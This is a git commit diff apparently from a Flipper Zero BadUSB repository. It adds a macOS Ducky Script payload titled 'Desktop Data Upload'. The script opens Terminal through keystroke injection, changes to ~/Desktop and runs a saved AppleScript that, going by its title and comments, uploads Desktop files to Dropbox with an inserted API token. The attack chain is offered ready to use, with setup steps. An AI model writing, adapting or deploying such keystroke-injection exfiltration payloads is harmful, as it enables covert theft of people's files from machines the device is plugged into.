Update Desktop Data Upload .txt
This commit is contained in:
@@ -2,6 +2,9 @@ REM Author: Narsty
|
||||
REM Title: Desktop Data Upload
|
||||
REM Version 1.0 MacOs
|
||||
|
||||
REM Copy and paste this script/code into the text editor
|
||||
REM Replace the "Your API token Here" placeholder with your actual Dropbox API token
|
||||
REM Save this script below as a .scpt file (you can use Script Editor) to your desktop.
|
||||
|
||||
|
||||
osascript -e 'tell application "Script Editor"
|
||||
@@ -16,5 +19,27 @@ osascript -e 'tell application "Script Editor"
|
||||
do shell script uploadScript
|
||||
end tell'
|
||||
|
||||
REM Title: Desktop Data Upload Execution Script
|
||||
REM Version 1.0 MacOs
|
||||
|
||||
REM Save the below Ducky Script as a .txt file (main Read.me has step by step directions)
|
||||
REM and put the .txt on your flipper zero to execute the osascript through the terminal.
|
||||
|
||||
|
||||
DELAY 500
|
||||
GUI SPACE
|
||||
DELAY 500
|
||||
STRING terminal
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING cd ~/Desktop
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING osascript DTDUpload.scpt
|
||||
ENTER
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user